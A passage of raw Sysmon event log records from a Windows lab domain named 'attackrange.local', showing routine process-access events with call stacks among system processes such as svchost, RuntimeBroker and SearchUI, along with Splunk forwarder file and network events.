dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.525{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.525{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.525{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.524{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.524{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.524{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.523{466BC892-32D3-60E8-770B-00000000CF01}63569384C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.523{466BC892-32D3-60E8-770B-00000000CF01}63569384C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.224{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A4C543F5A957AE12D3E8E16AA82067D,SHA256=ABC00115FE37A9FDB3F631A183D86C7D5F5D179E5D5859A82FA69C2D6D93AFB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810014Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:35.839{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DFAFF2FD9DDE9C328E0BAC4D6BDDA07,SHA256=A0C28F66AB18C611A6DB2F2C88D85ECD27F9B3E84C5E680B2F362559FE1A0B3E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:27.704{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61937-false10.0.1.12-8000- 10341000x80000000000000001053762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.926{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F7CF-60EB-D77D-00000000CF01}7440C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:35.910{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F7CF-60EB-D77D-00000000CF01}7440C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.910{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F7CF-60EB-D77D-00000000CF01}7440C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.895{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F7CF-60EB-D77D-00000000CF01}7440C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:35.895{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F7CF-60EB-D77D-00000000CF01}7440C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.895{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F7CF-60EB-D77D-00000000CF01}7440C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:35.863{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+6e886|C:\Windows\System32\windows.storage.dll+701e8|C:\Windows\system32\windows.cortana.Desktop.dll+f6ca|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001053755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:35.863{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+d3034|C:\Windows\System32\windows.storage.dll+d072b|C:\Windows\system32\windows.cortana.Desktop.dll+f61e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001053754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:35.848{466BC892-32D3-60E8-6F0B-00000000CF01}70762764C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+6e886|C:\Windows\System32\windows.storage.dll+701e8|C:\Windows\system32\windows.cortana.Desktop.dll+f6ca|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001053753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:35.848{466BC892-32D3-60E8-6F0B-00000000CF01}70762764C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+d3034|C:\Windows\System32\windows.storage.dll+d072b|C:\Windows\system32\windows.cortana.Desktop.dll+f61e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001053752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:35.710{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:35.710{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:35.710{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:35.710{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.